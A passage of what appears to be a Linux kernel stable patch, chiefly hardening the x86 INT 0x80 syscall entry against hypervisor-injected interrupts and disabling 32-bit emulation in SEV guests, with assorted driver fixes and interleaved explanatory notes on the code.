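For context on the two checks deleted above: C.SWSP and C.SDSP are CSS-format
stores, where bits 12:7 of the instruction carry immediate bits and bits 6:2
carry rs2; there is no rd field. The "(insn >> SH_RD) & 0x1f" test therefore
read immediate bits and wrongly rejected stores whose offset had those bits
clear (an rd != 0 requirement only exists for the C.LWSP/C.LDSP loads). A
sketch of the field layout, with hypothetical macro names:

	/* CSS format: funct3[15:13] imm[12:7] rs2[6:2] op[1:0] */
	#define RVC_CSS_RS2(insn)	(((insn) >> 2) & 0x1f)
	#define RVC_CSS_IMM_HI(insn)	(((insn) >> 7) & 0x3f)
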
+diff --git a/arch/s390/mm/pgtable.c b/arch/s390/mm/pgtable.c
+index 4909dcd762e8c..9977d637f836d 100644
+--- a/arch/s390/mm/pgtable.c
++++ b/arch/s390/mm/pgtable.c
+@@ -731,7 +731,7 @@ void ptep_zap_unused(struct mm_struct *mm, unsigned long addr,
+ 		pte_clear(mm, addr, ptep);
+ 	}
+ 	if (reset)
+-		pgste_val(pgste) &= ~_PGSTE_GPS_USAGE_MASK;
++		pgste_val(pgste) &= ~(_PGSTE_GPS_USAGE_MASK | _PGSTE_GPS_NODAT);
+ 	pgste_set_unlock(ptep, pgste);
+ 	preempt_enable();
+ }
+diff --git a/arch/x86/coco/tdx/tdx.c b/arch/x86/coco/tdx/tdx.c
+index 8a1d48b8c2a3e..d0565a9e7d8c9 100644
+--- a/arch/x86/coco/tdx/tdx.c
++++ b/arch/x86/coco/tdx/tdx.c
+@@ -8,6 +8,7 @@
+ #include <asm/coco.h>
+ #include <asm/tdx.h>
+ #include <asm/vmx.h>
++#include <asm/ia32.h>
+ #include <asm/insn.h>
+ #include <asm/insn-eval.h>
+ #include <asm/pgtable.h>
+diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
+index 93c60c0c9d4a7..9c0b26ae51069 100644
+--- a/arch/x86/entry/common.c
++++ b/arch/x86/entry/common.c
+@@ -25,6 +25,7 @@
+ #include <xen/events.h>
+ #endif
+ 
++#include <asm/apic.h>
+ #include <asm/desc.h>
+ #include <asm/traps.h>
+ #include <asm/vdso.h>
+@@ -96,6 +97,10 @@ static __always_inline int syscall_32_enter(struct pt_regs *regs)
+ 	return (int)regs->orig_ax;
+ }
+ 
++#ifdef CONFIG_IA32_EMULATION
++bool __ia32_enabled __ro_after_init = true;
++#endif
++
+ /*
+  * Invoke a 32-bit syscall.  Called with IRQs on in CONTEXT_KERNEL.
+  */
+@@ -115,7 +120,96 @@ static __always_inline void do_syscall_32_irqs_on(struct pt_regs *regs, int nr)
+ 	}
+ }
+ 
+-/* Handles int $0x80 */
++#ifdef CONFIG_IA32_EMULATION
++static __always_inline bool int80_is_external(void)
++{
++	const unsigned int offs = (0x80 / 32) * 0x10;
++	const u32 bit = BIT(0x80 % 32);
++
++	/* The local APIC on XENPV guests is fake */
++	if (cpu_feature_enabled(X86_FEATURE_XENPV))
++		return false;
++
++	/*
++	 * If vector 0x80 is set in the APIC ISR then this is an external
++	 * interrupt. Either from broken hardware or injected by a VMM.
++	 *
++	 * Note: In guest mode this is only valid for secure guests where
++	 * the secure module fully controls the vAPIC exposed to the guest.
++	 */
++	return apic_read(APIC_ISR + offs) & bit;
++}
++
++/**
++ * int80_emulation - 32-bit legacy syscall entry
++ *
++ * This entry point can be used by 32-bit and 64-bit programs to perform
++ * 32-bit system calls.  Instances of INT $0x80 can be found inline in
++ * various programs and libraries.  It is also used by the vDSO's
++ * __kernel_vsyscall fallback for hardware that doesn't support a faster
++ * entry method.  Restarted 32-bit system calls also fall back to INT
++ * $0x80 regardless of what instruction was originally used to do the
++ * system call.
++ *
++ * This is considered a slow path.  It is not used by most libc
++ * implementations on modern hardware except during process startup.
++ *
++ * The arguments for the INT $0x80 based syscall are on stack in the
++ * pt_regs structure:
++ *   eax:				system call number
++ *   ebx, ecx, edx, esi, edi, ebp:	arg1 - arg 6
++ */
++DEFINE_IDTENTRY_RAW(int80_emulation)
++{
++	int nr;
++
++	/* Kernel does not use INT $0x80! */
++	if (unlikely(!user_mode(regs))) {
++		irqentry_enter(regs);
++		instrumentation_begin();
++		panic("Unexpected external interrupt 0x80\n");
++	}
++
++	/*
++	 * Establish kernel context for instrumentation, including for
++	 * int80_is_external() below which calls into the APIC driver.
++	 * Identical for soft and external interrupts.
++	 */
++	enter_from_user_mode(regs);
++
++	instrumentation_begin();
++	add_random_kstack_offset();
++
++	/* Validate that this is a soft interrupt to the extent possible */
++	if (unlikely(int80_is_external()))
++		panic("Unexpected external interrupt 0x80\n");
++
++	/*
++	 * The low level idtentry code pushed -1 into regs::orig_ax
++	 * and regs::ax contains the syscall number.
++	 *
++	 * User tracing code (ptrace or signal handlers) might assume
++	 * that the regs::orig_ax contains a 32-bit number on invoking
++	 * a 32-bit syscall.
++	 *
++	 * Establish the syscall convention by saving the 32bit truncated
++	 * syscall number in regs::orig_ax and by invalidating regs::ax.
++	 */
++	regs->orig_ax = regs->ax & GENMASK(31, 0);
++	regs->ax = -ENOSYS;
++
++	nr = syscall_32_enter(regs);
++
++	local_irq_enable();
++	nr = syscall_enter_from_user_mode_work(regs, nr);
++	do_syscall_32_irqs_on(regs, nr);
++
++	instrumentation_end();
++	syscall_exit_to_user_mode(regs);
++}
++#else /* CONFIG_IA32_EMULATION */
++
++/* Handles int $0x80 on a 32bit kernel */
+ __visible noinstr void do_int80_syscall_32(struct pt_regs *regs)
+ {
+ 	int nr = syscall_32_enter(regs);
+@@ -134,6 +228,7 @@ __visible noinstr void do_int80_syscall_32(struct pt_regs *regs)
+ 	instrumentation_end();
+ 	syscall_exit_to_user_mode(regs);
+ }
++#endif /* !CONFIG_IA32_EMULATION */
+ 
+ static noinstr bool __do_fast_syscall_32(struct pt_regs *regs)
+ {
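
The magic numbers in int80_is_external() follow from the local APIC register
layout: the 256 vector bits of the in-service register are spread over eight
32-bit registers spaced 0x10 apart. A generalized sketch (apic_vector_in_isr
is a hypothetical helper, not kernel API):

	static bool apic_vector_in_isr(unsigned int vector)
	{
		/* eight 32-bit ISR registers, 0x10 apart */
		unsigned int offs = (vector / 32) * 0x10;

		return apic_read(APIC_ISR + offs) & BIT(vector % 32);
	}

For vector 0x80 this gives offs == 0x40 and bit 0, matching the constants
above. A set ISR bit means the vector arrived as a hardware or injected
interrupt rather than a software INT $0x80, which is the case the handler
refuses with a panic.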
+diff --git a/arch/x86/entry/entry_64_compat.S b/arch/x86/entry/entry_64_compat.S
+index 4dd19819053a5..d6c08d8986b17 100644
+--- a/arch/x86/entry/entry_64_compat.S
++++ b/arch/x86/entry/entry_64_compat.S
+@@ -277,80 +277,3 @@ SYM_INNER_LABEL(entry_SYSRETL_compat_end, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+ 	int3
+ SYM_CODE_END(entry_SYSCALL_compat)
+-
+-/*
+- * 32-bit legacy system call entry.
+- *
+- * 32-bit x86 Linux system calls traditionally used the INT $0x80
+- * instruction.  INT $0x80 lands here.
+- *
+- * This entry point can be used by 32-bit and 64-bit programs to perform
+- * 32-bit system calls.  Instances of INT $0x80 can be found inline in
+- * various programs and libraries.  It is also used by the vDSO's
+- * __kernel_vsyscall fallback for hardware that doesn't support a faster
+- * entry method.  Restarted 32-bit system calls also fall back to INT
+- * $0x80 regardless of what instruction was originally used to do the
+- * system call.
+- *
+- * This is considered a slow path.  It is not used by most libc
+- * implementations on modern hardware except during process startup.
+- *
+- * Arguments:
+- * eax  system call number
+- * ebx  arg1
+- * ecx  arg2
+- * edx  arg3
+- * esi  arg4
+- * edi  arg5
+- * ebp  arg6
+- */
+-SYM_CODE_START(entry_INT80_compat)
+-	UNWIND_HINT_ENTRY
+-	ENDBR
+-	/*
+-	 * Interrupts are off on entry.
+-	 */
+-	ASM_CLAC			/* Do this early to minimize exposure */
+-	ALTERNATIVE "swapgs", "", X86_FEATURE_XENPV
+-
+-	/*
+-	 * User tracing code (ptrace or signal handlers) might assume that
+-	 * the saved RAX contains a 32-bit number when we're invoking a 32-bit
+-	 * syscall.  Just in case the high bits are nonzero, zero-extend
+-	 * the syscall number.  (This could almost certainly be deleted
+-	 * with no ill effects.)
+-	 */
+-	movl	%eax, %eax
+-
+-	/* switch to thread stack expects orig_ax and rdi to be pushed */
+-	pushq	%rax			/* pt_regs->orig_ax */
+-
+-	/* Need to switch before accessing the thread stack. */
+-	SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
+-
+-	/* In the Xen PV case we already run on the thread stack. */
+-	ALTERNATIVE "", "jmp .Lint80_keep_stack", X86_FEATURE_XENPV
+-
+-	movq	%rsp, %rax
+-	movq	PER_CPU_VAR(cpu_current_top_of_stack), %rsp
+-
+-	pushq	5*8(%rax)		/* regs->ss */
+-	pushq	4*8(%rax)		/* regs->rsp */
+-	pushq	3*8(%rax)		/* regs->eflags */
+-	pushq	2*8(%rax)		/* regs->cs */
+-	pushq	1*8(%rax)		/* regs->ip */
+-	pushq	0*8(%rax)		/* regs->orig_ax */
+-.Lint80_keep_stack:
+-
+-	PUSH_AND_CLEAR_REGS rax=$-ENOSYS
+-	UNWIND_HINT_REGS
+-
+-	cld
+-
+-	IBRS_ENTER
+-	UNTRAIN_RET
+-
+-	movq	%rsp, %rdi
+-	call	do_int80_syscall_32
+-	jmp	swapgs_restore_regs_and_return_to_usermode
+-SYM_CODE_END(entry_INT80_compat)
+diff --git a/arch/x86/include/asm/ia32.h b/arch/x86/include/asm/ia32.h
+index fada857f0a1ed..9805629479d96 100644
+--- a/arch/x86/include/asm/ia32.h
++++ b/arch/x86/include/asm/ia32.h
+@@ -68,6 +68,27 @@ extern void ia32_pick_mmap_layout(struct mm_struct *mm);
+ 
+ #endif
+ 
+-#endif /* CONFIG_IA32_EMULATION */
++extern bool __ia32_enabled;
++
++static inline bool ia32_enabled(void)
++{
++	return __ia32_enabled;
++}
++
++static inline void ia32_disable(void)
++{
++	__ia32_enabled = false;
++}
++
++#else /* !CONFIG_IA32_EMULATION */
++
++static inline bool ia32_enabled(void)
++{
++	return IS_ENABLED(CONFIG_X86_32);
++}
++
++static inline void ia32_disable(void) {}
++
++#endif
+ 
+ #endif /* _ASM_X86_IA32_H */
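
ia32_enabled() gives early boot code a single runtime switch for 32-bit
compat support. As a sketch of the kind of call site this is meant for
(hypothetical here; in this patch the int80 gate is still registered
unconditionally via def_idts[]), an ia32-only IDT table could be gated like
so:

	/* hypothetical ia32_idt[] holding the int80 system gate */
	if (ia32_enabled())
		idt_setup_from_table(idt_table, ia32_idt,
				     ARRAY_SIZE(ia32_idt), true);
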
+diff --git a/arch/x86/include/asm/idtentry.h b/arch/x86/include/asm/idtentry.h
+index 72184b0b2219e..fca710a93eb9c 100644
+--- a/arch/x86/include/asm/idtentry.h
++++ b/arch/x86/include/asm/idtentry.h
+@@ -569,6 +569,10 @@ DECLARE_IDTENTRY_RAW(X86_TRAP_UD,		exc_invalid_op);
+ DECLARE_IDTENTRY_RAW(X86_TRAP_BP,		exc_int3);
+ DECLARE_IDTENTRY_RAW_ERRORCODE(X86_TRAP_PF,	exc_page_fault);
+ 
++#if defined(CONFIG_IA32_EMULATION)
++DECLARE_IDTENTRY_RAW(IA32_SYSCALL_VECTOR,	int80_emulation);
++#endif
++
+ #ifdef CONFIG_X86_MCE
+ #ifdef CONFIG_X86_64
+ DECLARE_IDTENTRY_MCE(X86_TRAP_MC,	exc_machine_check);
+diff --git a/arch/x86/include/asm/proto.h b/arch/x86/include/asm/proto.h
+index 12ef86b19910d..84294b66b9162 100644
+--- a/arch/x86/include/asm/proto.h
++++ b/arch/x86/include/asm/proto.h
+@@ -32,10 +32,6 @@ void entry_SYSCALL_compat(void);
+ void entry_SYSCALL_compat_safe_stack(void);
+ void entry_SYSRETL_compat_unsafe_stack(void);
+ void entry_SYSRETL_compat_end(void);
+-void entry_INT80_compat(void);
+-#ifdef CONFIG_XEN_PV
+-void xen_entry_INT80_compat(void);
+-#endif
+ #endif
+ 
+ void x86_configure_nx(void);
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index b66960358381b..c1d09c8844d67 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -1291,6 +1291,9 @@ static void zenbleed_check_cpu(void *unused)
+ 
+ void amd_check_microcode(void)
+ {
++	if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD)
++		return;
++
+ 	on_each_cpu(zenbleed_check_cpu, NULL, 1);
+ }
+ 
+diff --git a/arch/x86/kernel/idt.c b/arch/x86/kernel/idt.c
+index a58c6bc1cd68c..f5a3374e62cb1 100644
+--- a/arch/x86/kernel/idt.c
++++ b/arch/x86/kernel/idt.c
+@@ -117,7 +117,7 @@ static const __initconst struct idt_data def_idts[] = {
+ 
+ 	SYSG(X86_TRAP_OF,		asm_exc_overflow),
+ #if defined(CONFIG_IA32_EMULATION)
+-	SYSG(IA32_SYSCALL_VECTOR,	entry_INT80_compat),
++	SYSG(IA32_SYSCALL_VECTOR,	asm_int80_emulation),
+ #elif defined(CONFIG_X86_32)
+ 	SYSG(IA32_SYSCALL_VECTOR,	entry_INT80_32),
+ #endif
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index 68b2a9d3dbc6b..c8dfb0fdde7f9 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -1279,10 +1279,6 @@ void setup_ghcb(void)
+ 	if (!cc_platform_has(CC_ATTR_GUEST_STATE_ENCRYPT))
+ 		return;
+ 
+-	/* First make sure the hypervisor talks a supported protocol. */
+-	if (!sev_es_negotiate_protocol())
+-		sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SEV_ES_GEN_REQ);
+-
+ 	/*
+ 	 * Check whether the runtime #VC exception handler is active. It uses
+ 	 * the per-CPU GHCB page which is set up by sev_es_init_vc_handling().
+@@ -1297,6 +1293,13 @@ void setup_ghcb(void)
+ 		return;
+ 	}
+ 
++	/*
++	 * Make sure the hypervisor talks a supported protocol.
++	 * This gets called only in the BSP boot phase.
++	 */
++	if (!sev_es_negotiate_protocol())
++		sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SEV_ES_GEN_REQ);
++
+ 	/*
+ 	 * Clear the boot_ghcb. The first exception comes in before the bss
+ 	 * section is cleared.
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 4194aa4c5f0e0..4a663812562db 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -1786,15 +1786,17 @@ void svm_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ 	bool old_paging = is_paging(vcpu);
+ 
+ #ifdef CONFIG_X86_64
+-	if (vcpu->arch.efer & EFER_LME && !vcpu->arch.guest_state_protected) {
++	if (vcpu->arch.efer & EFER_LME) {
+ 		if (!is_paging(vcpu) && (cr0 & X86_CR0_PG)) {
+ 			vcpu->arch.efer |= EFER_LMA;
+-			svm->vmcb->save.efer |= EFER_LMA | EFER_LME;
++			if (!vcpu->arch.guest_state_protected)
++				svm->vmcb->save.efer |= EFER_LMA | EFER_LME;
+ 		}
+ 
+ 		if (is_paging(vcpu) && !(cr0 & X86_CR0_PG)) {
+ 			vcpu->arch.efer &= ~EFER_LMA;
+-			svm->vmcb->save.efer &= ~(EFER_LMA | EFER_LME);
++			if (!vcpu->arch.guest_state_protected)
++				svm->vmcb->save.efer &= ~(EFER_LMA | EFER_LME);
+ 		}
+ 	}
+ #endif
+diff --git a/arch/x86/mm/mem_encrypt_amd.c b/arch/x86/mm/mem_encrypt_amd.c
+index 3ea0f763540a4..3e93af083e037 100644
+--- a/arch/x86/mm/mem_encrypt_amd.c
++++ b/arch/x86/mm/mem_encrypt_amd.c
+@@ -34,6 +34,7 @@
+ #include <asm/msr.h>
+ #include <asm/cmdline.h>
+ #include <asm/sev.h>
++#include <asm/ia32.h>
+ 
+ #include "mm_internal.h"
+ 
+@@ -502,6 +503,16 @@ void __init sme_early_init(void)
+ 	x86_platform.guest.enc_status_change_finish  = amd_enc_status_change_finish;
+ 	x86_platform.guest.enc_tlb_flush_required    = amd_enc_tlb_flush_required;
+ 	x86_platform.guest.enc_cache_flush_required  = amd_enc_cache_flush_required;
++
++	/*
++	 * The VMM is capable of injecting interrupt 0x80 and triggering the
++	 * compatibility syscall path.
++	 *
++	 * By default, the 32-bit emulation is disabled in order to ensure
++	 * the safety of the VM.
++	 */
++	if (sev_status & MSR_AMD64_SEV_ENABLED)
++		ia32_disable();
+ }
+ 
+ void __init mem_encrypt_free_decrypted_mem(void)
+diff --git a/arch/x86/xen/enlighten_pv.c b/arch/x86/xen/enlighten_pv.c
+index 333539bdbdaae..9280e15de3af5 100644
+--- a/arch/x86/xen/enlighten_pv.c
++++ b/arch/x86/xen/enlighten_pv.c
+@@ -623,7 +623,7 @@ static struct trap_array_entry trap_array[] = {
+ 	TRAP_ENTRY(exc_int3,				false ),
+ 	TRAP_ENTRY(exc_overflow,			false ),
+ #ifdef CONFIG_IA32_EMULATION
+-	{ entry_INT80_compat,          xen_entry_INT80_compat,          false },
++	TRAP_ENTRY(int80_emulation,			false ),
+ #endif
+ 	TRAP_ENTRY(exc_page_fault,			false ),
+ 	TRAP_ENTRY(exc_divide_error,			false ),
+diff --git a/arch/x86/xen/xen-asm.S b/arch/x86/xen/xen-asm.S
+index 6b4fdf6b95422..dec5e03e7a2cf 100644
+--- a/arch/x86/xen/xen-asm.S
++++ b/arch/x86/xen/xen-asm.S
+@@ -156,7 +156,7 @@ xen_pv_trap asm_xenpv_exc_machine_check
+ #endif /* CONFIG_X86_MCE */
+ xen_pv_trap asm_exc_simd_coprocessor_error
+ #ifdef CONFIG_IA32_EMULATION
+-xen_pv_trap entry_INT80_compat
++xen_pv_trap asm_int80_emulation
+ #endif
+ xen_pv_trap asm_exc_xen_unknown_trap
+ xen_pv_trap asm_exc_xen_hypervisor_callback
+diff --git a/drivers/acpi/scan.c b/drivers/acpi/scan.c
+index a0e347f6f97eb..94154a849a3ea 100644
+--- a/drivers/acpi/scan.c
++++ b/drivers/acpi/scan.c
+@@ -1563,17 +1563,22 @@ static const struct iommu_ops *acpi_iommu_configure_id(struct device *dev,
+ 	int err;
+ 	const struct iommu_ops *ops;
+ 
++	/* Serialise to make dev->iommu stable under our potential fwspec */
++	mutex_lock(&iommu_probe_device_lock);
+ 	/*
+ 	 * If we already translated the fwspec there is nothing left to do,
+ 	 * return the iommu_ops.
+ 	 */
+ 	ops = acpi_iommu_fwspec_ops(dev);
+-	if (ops)
++	if (ops) {
++		mutex_unlock(&iommu_probe_device_lock);
+ 		return ops;
++	}
+ 
+ 	err = iort_iommu_configure_id(dev, id_in);
+ 	if (err && err != -EPROBE_DEFER)
+ 		err = viot_iommu_configure(dev);
++	mutex_unlock(&iommu_probe_device_lock);
+ 
+ 	/*
+ 	 * If we have reason to believe the IOMMU driver missed the initial
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index e4a6da81cd4b3..9cc3a2b1b4fc1 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -4788,6 +4788,7 @@ static void binder_release_work(struct binder_proc *proc,
+ 				"undelivered TRANSACTION_ERROR: %u\n",
+ 				e->cmd);
+ 		} break;
++		case BINDER_WORK_TRANSACTION_ONEWAY_SPAM_SUSPECT:
+ 		case BINDER_WORK_TRANSACTION_COMPLETE: {
+ 			binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
+ 				"undelivered TRANSACTION_COMPLETE\n");
+diff --git a/drivers/base/devcoredump.c b/drivers/base/devcoredump.c
+index 1c06781f71148..f3bd9f104bd12 100644
+--- a/drivers/base/devcoredump.c
++++ b/drivers/base/devcoredump.c
+@@ -363,6 +363,7 @@ void dev_coredumpm(struct device *dev, struct module *owner,
+ 	devcd->devcd_dev.class = &devcd_class;
+ 
+ 	mutex_lock(&devcd->mutex);
++	dev_set_uevent_suppress(&devcd->devcd_dev, true);
+ 	if (device_add(&devcd->devcd_dev))
+ 		goto put_device;
+ 
+@@ -377,6 +378,8 @@ void dev_coredumpm(struct device *dev, struct module *owner,
+ 		              "devcoredump"))
+ 		dev_warn(dev, "devcoredump create_link failed\n");
+ 
++	dev_set_uevent_suppress(&devcd->devcd_dev, false);
++	kobject_uevent(&devcd->devcd_dev.kobj, KOBJ_ADD);
+ 	INIT_DELAYED_WORK(&devcd->del_wk, devcd_del);
+ 	schedule_delayed_work(&devcd->del_wk, DEVCD_TIMEOUT);
+ 	mutex_unlock(&devcd->mutex);
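
The devcoredump fix is an instance of a general driver-core pattern:
device_add() emits KOBJ_ADD itself, so udev could act on the event before the
failing/devcoredump links exist. Suppressing the uevent across setup and
sending it by hand closes the race. In outline (my_dev and my_create_links
are placeholders):

	dev_set_uevent_suppress(&my_dev->dev, true);

	err = device_add(&my_dev->dev);
	if (err)
		return err;

	my_create_links(my_dev);	/* the sysfs links userspace will chase */

	dev_set_uevent_suppress(&my_dev->dev, false);
	kobject_uevent(&my_dev->dev.kobj, KOBJ_ADD);
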
+diff --git a/drivers/base/regmap/regcache.c b/drivers/base/regmap/regcache.c
+index cf3fa998093de..4f3dd9316fb2f 100644
+--- a/drivers/base/regmap/regcache.c
++++ b/drivers/base/regmap/regcache.c
+@@ -410,8 +410,7 @@ out:
+ 			rb_entry(node, struct regmap_range_node, node);
+ 
+ 		/* If there's nothing in the cache there's nothing to sync */
+-		ret = regcache_read(map, this->selector_reg, &i);
+-		if (ret != 0)
++		if (regcache_read(map, this->selector_reg, &i) != 0)
+ 			continue;
+ 
+ 		ret = _regmap_write(map, this->selector_reg, i);
+diff --git a/drivers/gpio/gpiolib-sysfs.c b/drivers/gpio/gpiolib-sysfs.c
+index cd27bf173dec8..a64648682c72c 100644
+--- a/drivers/gpio/gpiolib-sysfs.c
++++ b/drivers/gpio/gpiolib-sysfs.c
+@@ -463,14 +463,17 @@ static ssize_t export_store(struct class *class,
+ 		goto done;
+ 
+ 	status = gpiod_set_transitory(desc, false);
+-	if (!status) {
+-		status = gpiod_export(desc, true);
+-		if (status < 0)
+-			gpiod_free(desc);
+-		else
+-			set_bit(FLAG_SYSFS, &desc->flags);
++	if (status) {
++		gpiod_free(desc);
++		goto done;
+ 	}
+ 
++	status = gpiod_export(desc, true);
++	if (status < 0)
++		gpiod_free(desc);
++	else
++		set_bit(FLAG_SYSFS, &desc->flags);
++
+ done:
+ 	if (status)
+ 		pr_debug("%s: status %d\n", __func__, status);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index ced4e7e8f98b5..133e4e03c143c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -201,7 +201,7 @@ static int amdgpu_cs_pass1(struct amdgpu_cs_parser *p,
+ 	}
+ 
+ 	for (i = 0; i < p->nchunks; i++) {
+-		struct drm_amdgpu_cs_chunk __user **chunk_ptr = NULL;
++		struct drm_amdgpu_cs_chunk __user *chunk_ptr = NULL;
+ 		struct drm_amdgpu_cs_chunk user_chunk;
+ 		uint32_t __user *cdata;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+index 2fced451f0aea..aabde6ebb190e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+@@ -90,7 +90,7 @@ static void amdgpu_display_flip_work_func(struct work_struct *__work)
+ 
+ 	struct drm_crtc *crtc = &amdgpu_crtc->base;
+ 	unsigned long flags;
+-	unsigned i;
++	unsigned int i;
+ 	int vpos, hpos;
+ 
+ 	for (i = 0; i < work->shared_count; ++i)
+@@ -167,7 +167,7 @@ int amdgpu_display_crtc_page_flip_target(struct drm_crtc *crtc,
+ 	u64 tiling_flags;
+ 	int i, r;
+ 
+-	work = kzalloc(sizeof *work, GFP_KERNEL);
++	work = kzalloc(sizeof(*work), GFP_KERNEL);
+ 	if (work == NULL)
+ 		return -ENOMEM;
+ 
+@@ -298,18 +298,17 @@ int amdgpu_display_crtc_set_config(struct drm_mode_set *set,
+ 
+ 	adev = drm_to_adev(dev);
+ 	/* if we have active crtcs and we don't have a power ref,
+-	   take the current one */
++	 * take the current one
++	 */
+ 	if (active && !adev->have_disp_power_ref) {
+ 		adev->have_disp_power_ref = true;
+ 		return ret;
+ 	}
+-	/* if we have no active crtcs, then drop the power ref
+-	   we got before */
+-	if (!active && adev->have_disp_power_ref) {
+-		pm_runtime_put_autosuspend(dev->dev);
++	/* if we have no active crtcs, then go to
++	 * drop the power ref we got before
++	 */
++	if (!active && adev->have_disp_power_ref)
+ 		adev->have_disp_power_ref = false;
+-	}
+-
+ out:
+ 	/* drop the power reference we got coming in here */
+ 	pm_runtime_put_autosuspend(dev->dev);
+@@ -473,11 +472,10 @@ bool amdgpu_display_ddc_probe(struct amdgpu_connector *amdgpu_connector,
+ 	if (amdgpu_connector->router.ddc_valid)
+ 		amdgpu_i2c_router_select_ddc_port(amdgpu_connector);
+ 
+-	if (use_aux) {
++	if (use_aux)
+ 		ret = i2c_transfer(&amdgpu_connector->ddc_bus->aux.ddc, msgs, 2);
+-	} else {
++	else
+ 		ret = i2c_transfer(&amdgpu_connector->ddc_bus->adapter, msgs, 2);
+-	}
+ 
+ 	if (ret != 2)
+ 		/* Couldn't find an accessible DDC on this connector */
+@@ -486,10 +484,12 @@ bool amdgpu_display_ddc_probe(struct amdgpu_connector *amdgpu_connector,
+ 	 * EDID header starts with:
+ 	 * 0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x00.
+ 	 * Only the first 6 bytes must be valid as
+-	 * drm_edid_block_valid() can fix the last 2 bytes */
++	 * drm_edid_block_valid() can fix the last 2 bytes
++	 */
+ 	if (drm_edid_header_is_valid(buf) < 6) {
+ 		/* Couldn't find an accessible EDID on this
+-		 * connector */
++		 * connector
++		 */
+ 		return false;
+ 	}
+ 	return true;
+@@ -1204,8 +1204,10 @@ amdgpu_display_user_framebuffer_create(struct drm_device *dev,
+ 
+ 	obj = drm_gem_object_lookup(file_priv, mode_cmd->handles[0]);
+ 	if (obj ==  NULL) {
+-		drm_dbg_kms(dev, "No GEM object associated to handle 0x%08X, "
+-			    "can't create framebuffer\n", mode_cmd->handles[0]);
++		drm_dbg_kms(dev,
++			    "No GEM object associated to handle 0x%08X, can't create framebuffer\n",
++			    mode_cmd->handles[0]);
++
+ 		return ERR_PTR(-ENOENT);
+ 	}
+ 
+@@ -1398,6 +1400,7 @@ bool amdgpu_display_crtc_scaling_mode_fixup(struct drm_crtc *crtc,
+ 	}
+ 	if (amdgpu_crtc->rmx_type != RMX_OFF) {
+ 		fixed20_12 a, b;
++
+ 		a.full = dfixed_const(src_v);
+ 		b.full = dfixed_const(dst_v);
+ 		amdgpu_crtc->vsc.full = dfixed_div(a, b);
+@@ -1417,7 +1420,7 @@ bool amdgpu_display_crtc_scaling_mode_fixup(struct drm_crtc *crtc,
+  *
+  * \param dev Device to query.
+  * \param pipe Crtc to query.
+- * \param flags Flags from caller (DRM_CALLED_FROM_VBLIRQ or 0).
++ * \param flags from caller (DRM_CALLED_FROM_VBLIRQ or 0).
+  *              For driver internal use only also supports these flags:
+  *
+  *              USE_REAL_VBLANKSTART to use the real start of vblank instead
+@@ -1493,8 +1496,8 @@ int amdgpu_display_get_crtc_scanoutpos(struct drm_device *dev,
+ 
+ 	/* Called from driver internal vblank counter query code? */
+ 	if (flags & GET_DISTANCE_TO_VBLANKSTART) {
+-	    /* Caller wants distance from real vbl_start in *hpos */
+-	    *hpos = *vpos - vbl_start;
++		/* Caller wants distance from real vbl_start in *hpos */
++		*hpos = *vpos - vbl_start;
+ 	}
+ 
+ 	/* Fudge vblank to start a few scanlines earlier to handle the
+@@ -1516,7 +1519,7 @@ int amdgpu_display_get_crtc_scanoutpos(struct drm_device *dev,
+ 
+ 	/* In vblank? */
+ 	if (in_vbl)
+-	    ret |= DRM_SCANOUTPOS_IN_VBLANK;
++		ret |= DRM_SCANOUTPOS_IN_VBLANK;
+ 
+ 	/* Called from driver internal vblank counter query code? */
+ 	if (flags & GET_DISTANCE_TO_VBLANKSTART) {
+@@ -1622,6 +1625,7 @@ int amdgpu_display_suspend_helper(struct amdgpu_device *adev)
+ 
+ 		if (amdgpu_crtc->cursor_bo && !adev->enable_virtual_display) {
+ 			struct amdgpu_bo *aobj = gem_to_amdgpu_bo(amdgpu_crtc->cursor_bo);
++
+ 			r = amdgpu_bo_reserve(aobj, true);
+ 			if (r == 0) {
+ 				amdgpu_bo_unpin(aobj);
+@@ -1629,9 +1633,9 @@ int amdgpu_display_suspend_helper(struct amdgpu_device *adev)
+ 			}
+ 		}
+ 
+-		if (fb == NULL || fb->obj[0] == NULL) {
++		if (!fb || !fb->obj[0])
+ 			continue;
+-		}
++
+ 		robj = gem_to_amdgpu_bo(fb->obj[0]);
+ 		if (!amdgpu_display_robj_is_fb(adev, robj)) {
+ 			r = amdgpu_bo_reserve(robj, true);
+@@ -1658,6 +1662,7 @@ int amdgpu_display_resume_helper(struct amdgpu_device *adev)
+ 
+ 		if (amdgpu_crtc->cursor_bo && !adev->enable_virtual_display) {
+ 			struct amdgpu_bo *aobj = gem_to_amdgpu_bo(amdgpu_crtc->cursor_bo);
++
+ 			r = amdgpu_bo_reserve(aobj, true);
+ 			if (r == 0) {
+ 				r = amdgpu_bo_pin(aobj, AMDGPU_GEM_DOMAIN_VRAM);
